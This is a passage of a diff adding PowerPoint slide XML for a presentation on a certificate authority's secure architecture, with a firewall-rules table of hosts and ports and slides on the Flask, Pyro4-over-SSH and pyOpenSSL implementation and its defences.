+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Internet</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Internet</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>HTTPS (443) </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Webserver</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>OpenVPN network </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>IPCop SSH (8022)</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>MainFirewall</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>BackupServer </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr algn="ctr"/>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>IPCop SSH (8022) </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>MainFirewall</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>OpenVPN network</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>SSH (22) </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Backupserver</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>OpenVPN network</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>SSH (22) </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>CACore</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>OpenVPN network</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>SSH (22) </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Webserver</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Backupserver</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>SSH (22) </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Webserver</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Webserver </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>SSH (22) </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>CACore</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+              <a:tr h="370840">
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>CACore </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="nl-NL" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>SSH (22) </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+                <a:tc>
+                  <a:txBody>
+                    <a:bodyPr/>
+                    <a:lstStyle/>
+                    <a:p>
+                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+                        <a:lnSpc>
+                          <a:spcPct val="100000"/>
+                        </a:lnSpc>
+                        <a:spcBef>
+                          <a:spcPts val="0"/>
+                        </a:spcBef>
+                        <a:spcAft>
+                          <a:spcPts val="0"/>
+                        </a:spcAft>
+                        <a:buClrTx/>
+                        <a:buSzTx/>
+                        <a:buFontTx/>
+                        <a:buNone/>
+                        <a:tabLst/>
+                        <a:defRPr/>
+                      </a:pPr>
+                      <a:r>
+                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
+                          <a:effectLst/>
+                        </a:rPr>
+                        <a:t>Webserver </a:t>
+                      </a:r>
+                      <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+                    </a:p>
+                  </a:txBody>
+                  <a:tcPr/>
+                </a:tc>
+              </a:tr>
+            </a:tbl>
+          </a:graphicData>
+        </a:graphic>
+      </p:graphicFrame>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Textfeld 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="946484" y="1457743"/>
+            <a:ext cx="2403222" cy="584776"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>Firewall rules</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" sz="3200" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348842045"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Implementation</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1433064" y="2108184"/>
+            <a:ext cx="8229600" cy="4525963"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Webapplication</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Python</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Flask (CSRF, XSS)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>nginx (DDOS, HTTPS)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>RPC </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>via Pyro4</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>SSH tunnel (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>secrecy and </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>integrity)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>CA Core application</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Python</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>pyOpenSSL </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>m2crypto </a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>SQLAlchemy </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>(SQL injections)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Textfeld 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="946484" y="1457743"/>
+            <a:ext cx="3351999" cy="584776"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>Applications &amp; RPC</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" sz="3200" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784858385"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Implementation</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>All traffic via SSH (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>Protect information while being processed, in transit, and in </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>storage)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Backup/Logging (BCM, Accountability, Intrusion detection)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Local iptables (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Security in depth)</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="838851764"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
